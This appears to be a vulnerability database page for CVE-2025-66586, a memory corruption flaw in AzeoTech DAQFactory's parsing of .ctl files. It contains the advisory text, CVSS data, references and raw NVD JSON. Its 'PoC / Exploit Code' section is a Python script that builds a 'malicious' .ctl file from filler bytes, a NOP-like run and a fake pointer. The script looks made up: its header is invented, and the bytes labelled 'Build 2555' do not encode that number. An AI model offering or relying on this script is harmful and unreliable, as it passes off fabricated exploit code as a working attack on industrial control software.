CVE-2025-66586

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE

AzeoTech DAQFactory < 20.7 Build 2555

AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-66586 PoC - AzeoTech DAQFactory .ctl File Memory Corruption
# Generate malicious .ctl file to trigger memory corruption

import struct

def generate_malicious_ctl():
    """Generate a crafted .ctl file that triggers the vulnerability"""
    
    # DAQFactory .ctl file header
    header = b'DAQFactory Control File\x00'
    
    # Version marker (targeting version 20.7 Build 2555)
    version = b'\x20\x07\xFF\x9B'  # Version 20.7, Build 2555
    
    # Malicious payload to trigger type confusion
    # This causes memory corruption when parsed
    type_confusion_marker = b'\x41\x42\x43\x44'  # 'ABCD' - type confusion trigger
    
    # Heap spray / memory corruption payload
    corruption_data = b'A' * 1024 + b'\x90' * 256
    
    # Crafted object reference that causes incompatible type access
    object_ref = struct.pack('<I', 0x41414141)  # Invalid pointer
    
    # Build the malicious .ctl content
    malicious_content = (
        header +
        version +
        type_confusion_marker +
        b'\x00\x01\x00\x00' +  # Object type marker
        object_ref +
        corruption_data +
        b'\x00' * 512  # Padding
    )
    
    return malicious_content

def main():
    """Generate and save the PoC .ctl file"""
    payload = generate_malicious_ctl()
    
    output_file = 'CVE-2025-66586_malicious.ctl'
    with open(output_file, 'wb') as f:
        f.write(payload)
    
    print(f'[+] Generated malicious .ctl file: {output_file}')
    print(f'[+] File size: {len(payload)} bytes')
    print('[!] This PoC triggers memory corruption in DAQFactory 20.7 Build 2555')
    print('[!] When opened, it may allow arbitrary code execution')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66586
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66586
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66586/
[4] VulDB https://vuldb.com/cve/CVE-2025-66586
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66586", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.583", "lastModified": "2026-01-02T20:06:35.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}